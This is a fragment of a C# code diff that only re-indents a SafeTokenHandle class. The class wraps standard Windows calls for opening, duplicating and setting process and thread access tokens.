+        public static SafeTokenHandle FromCurrentThread(AccessTypes desiredAccess = AccessTypes.TokenDuplicate, bool openAsSelf = true)
             => FromThread(Kernel32.GetCurrentThread(), desiredAccess, openAsSelf);
 
-		public static SafeTokenHandle FromProcess(IntPtr hProcess, AccessTypes desiredAccess = AccessTypes.TokenDuplicate)
+        public static SafeTokenHandle FromProcess(IntPtr hProcess, AccessTypes desiredAccess = AccessTypes.TokenDuplicate)
-		{
+        {
-			SafeTokenHandle val;
+            SafeTokenHandle val;
-			if (!Advapi32.OpenProcessToken(hProcess, desiredAccess, out val))
+            if (!Advapi32.OpenProcessToken(hProcess, desiredAccess, out val))
-				throw new System.ComponentModel.Win32Exception();
+                throw new System.ComponentModel.Win32Exception();
-			return val;
+            return val;
-		}
+        }
 
-		public static SafeTokenHandle FromThread(IntPtr hThread, AccessTypes desiredAccess = AccessTypes.TokenDuplicate, bool openAsSelf = true)
+        public static SafeTokenHandle FromThread(IntPtr hThread, AccessTypes desiredAccess = AccessTypes.TokenDuplicate, bool openAsSelf = true)
-		{
+        {
-			SafeTokenHandle val;
+            SafeTokenHandle val;
-			if (!Advapi32.OpenThreadToken(hThread, desiredAccess, openAsSelf, out val))
+            if (!Advapi32.OpenThreadToken(hThread, desiredAccess, openAsSelf, out val))
-			{
+            {
-				if (Marshal.GetLastWin32Error() == ERROR_NO_TOKEN)
+                if (Marshal.GetLastWin32Error() == ERROR_NO_TOKEN)
-				{
+                {
-					SafeTokenHandle pval = FromCurrentProcess();
+                    SafeTokenHandle pval = FromCurrentProcess();
-					if (!Advapi32.DuplicateTokenEx(pval, AccessTypes.TokenImpersonate | desiredAccess, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.Impersonation, TokenType.TokenImpersonation, ref val))
+                    if (!Advapi32.DuplicateTokenEx(pval, AccessTypes.TokenImpersonate | desiredAccess, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.Impersonation, TokenType.TokenImpersonation, ref val))
-						throw new System.ComponentModel.Win32Exception();
+                        throw new System.ComponentModel.Win32Exception();
-					if (!Advapi32.SetThreadToken(IntPtr.Zero, val))
+                    if (!Advapi32.SetThreadToken(IntPtr.Zero, val))
-						throw new System.ComponentModel.Win32Exception();
+                        throw new System.ComponentModel.Win32Exception();
-				}
+                }
-				else
+                else
-					throw new System.ComponentModel.Win32Exception();
+                    throw new System.ComponentModel.Win32Exception();
-			}
+            }
-			return val;
+            return val;
-		}
+        }
-	}
+    }
 }